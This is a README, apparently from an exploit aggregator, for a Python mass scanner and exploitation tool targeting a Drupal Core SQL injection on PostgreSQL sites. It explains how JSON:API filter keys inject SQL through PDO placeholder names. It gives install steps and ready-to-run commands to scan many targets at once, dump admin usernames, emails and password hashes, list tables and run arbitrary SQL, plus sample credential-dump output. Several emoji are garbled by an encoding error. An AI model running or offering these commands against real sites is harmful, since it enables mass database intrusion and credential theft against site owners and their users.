Share
## https://sploitus.com/exploit?id=1774D6F8-2B0F-5C66-A7AB-BE7B8E7A0B85
CVE-2026-9082 โ Drupal PostgreSQL SQL Injection
Mass Scanner & Exploitation Tool
Unauthenticated SQL Injection in Drupal Core (PostgreSQL)
JSON:API filter array key injection via PDO placeholder name abuse
---
## Overview
**CVE-2026-9082** is a **Highly Critical** SQL injection vulnerability in **Drupal Core** affecting all **PostgreSQL-backed** sites running Drupal **8.0 through 11.3.9**. Added to the **CISA Known Exploited Vulnerabilities (KEV) catalog on 2026-05-22** โ actively exploited in the wild.
### Impact
| Severity | CVSS | Auth Required | Attack Vector |
|----------|------|---------------|---------------|
| Critical | 9.8+ | None | HTTP (JSON:API) |
- **Data exfiltration** โ extract databases, users, password hashes
- **Privilege escalation** โ create admin accounts, modify content
- **Remote code execution** โ in some configurations via `pg_exec()` or `COPY ... PROGRAM`
### Affected Versions
| Status | Versions |
|--------|----------|
| โ Vulnerable | Drupal 8.0.0 โ 11.3.9 (PostgreSQL backend) |
| โ
Fixed | 11.3.10, 11.2.12, 10.6.9, 10.5.10 |
### How It Works
The flaw exists in `core/modules/pgsql/src/EntityQuery/Condition.php`. The `translateCondition()` method uses **user-controlled array keys** from JSON:API filter parameters to construct PDO placeholder names. PDO only parses `[a-zA-Z0-9_]` as placeholder names, so any suffix after `)` becomes **literal SQL** injected into the query.
```
JSON:API Filter โ array key with SQL โ PDO placeholder truncation โ SQL injection
```
---
## Features
- โ
**Mass scanner** โ scan hundreds of targets concurrently
- โ
**Single target mode** โ check individual Drupal sites
- โ
**Time-based detection** โ `pg_sleep()` blind SQLi confirmation
- โ
**Boolean-based detection** โ row count comparison
- โ
**Version extraction** โ identify PostgreSQL version
- โ
**Database info** โ extract current user and database name
- โ
**Admin credential dump** โ username, email, password hash (uid=1)
- โ
**Table listing** โ enumerate all public tables
- โ
**Custom SQL queries** โ run any extraction query
- โ
**Proxy support** โ route through Burp Suite or similar
- โ
**Output to file** โ save mass scan results
- โ
**Colored terminal output** โ easy to read results
---
## Installation
### Prerequisites
- Python 3.8+
- `pip` (Python package manager)
### Install Dependencies
```bash
# Clone the repo
git clone https://github.com/ridhinva/CVE-2026-9082.git
cd CVE-2026-9082
# Install requirements
pip install requests
```
That's it! Only one dependency โ `requests`.
---
## Usage
### ๐ต๏ธ Check Single Target
```bash
python3 cve_2026_9082_scanner.py -u https://target.com --check
```
### ๐ก Mass Scan Multiple Targets
```bash
python3 cve_2026_9082_scanner.py -f targets.txt
```
**`targets.txt` format:**
```
https://target1.com
target2.com
192.168.1.100
```
### ๐ Extract PostgreSQL Version
```bash
python3 cve_2026_9082_scanner.py -u https://target.com --version
```
### ๐๏ธ Extract Database Info
```bash
python3 cve_2026_9082_scanner.py -u https://target.com --dbinfo
```
### ๐ค Dump Admin Credentials (uid=1)
```bash
python3 cve_2026_9082_scanner.py -u https://target.com --admin
```
### ๐ List All Tables
```bash
python3 cve_2026_9082_scanner.py -u https://target.com --tables
```
### ๐ Custom SQL Query
```bash
python3 cve_2026_9082_scanner.py -u https://target.com --query "SELECT usename FROM pg_catalog.pg_user"
```
### Save Results to File
```bash
python3 cve_2026_9082_scanner.py -f targets.txt -o results.txt
```
### Use Proxy (Burp Suite)
```bash
python3 cve_2026_9082_scanner.py -u https://target.com --check --proxy http://127.0.0.1:8080
```
### Customize Timing
```bash
# Increase sleep time for time-based detection (default: 5s)
python3 cve_2026_9082_scanner.py -u https://target.com --check --delay 10
# Increase HTTP timeout for slow targets (default: 30s)
python3 cve_2026_9082_scanner.py -u https://target.com --check --timeout 60
```
---
## Command Reference
| Flag | Description |
|------|-------------|
| `-u, --url` | Single target URL |
| `-f, --file` | File with targets (one per line) |
| `-o, --output` | Save scan results to file |
| `--check` | Check if target is vulnerable |
| `--version` | Extract PostgreSQL version |
| `--dbinfo` | Extract DB user and database name |
| `--admin` | Extract Drupal admin credentials (uid=1) |
| `--tables` | List all database tables |
| `--query` | Custom SQL extraction query |
| `--threads` | Threads for mass scan (default: 20) |
| `--timeout` | HTTP request timeout (default: 30s) |
| `--delay` | pg_sleep delay for detection (default: 5s) |
| `--no-ssl-verify` | Skip TLS certificate verification |
| `--proxy` | HTTP proxy (e.g., http://127.0.0.1:8080) |
---
## Example Output
### Vulnerable Target
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ CVE-2026-9082 - Drupal PostgreSQL SQLi โ
โ Mass Scanner + Exploitation Tool v1.0.0 โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
CISA KEV: Added 2026-05-22 | Advisory: SA-CORE-2026-004
[*] Checking: https://vulnerable-drupal-site.com
[!!] VULNERABLE - https://vulnerable-drupal-site.com
Method: time-based (+5.2s)
Resource: node/article
```
### Admin Credential Dump
```
[+] username: admin
[+] email: admin@example.com
[+] pass_hash: $S$E8gJ8yJ8...hashed_password...
```
---
## References
| Source | Link |
|--------|------|
| Drupal Advisory | [SA-CORE-2026-004](https://www.drupal.org/sa-core-2026-004) |
| CISA KEV | [CVE-2026-9082](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) |
| Patch Commit | [ea9524d9](https://git.drupalcode.org/project/drupal/-/commit/ea9524d9) |
| NVD Entry | [CVE-2026-9082](https://nvd.nist.gov/vuln/detail/CVE-2026-9082) |
| Discoverer | Michael Maturi |
---
## โ ๏ธ Disclaimer
**This tool is for authorized security testing, educational purposes, and ethical research only.**
Unauthorized access to computer systems is illegal. The authors assume no liability and are not responsible for any misuse or damage caused by this program.
---
## Author
**Ridhin V A** ([@ridhinva](https://github.com/ridhinva)) โ Bug bounty hunter & security researcher
Built because CISA KEV said it's being exploited in the wild. Patch your Drupal sites.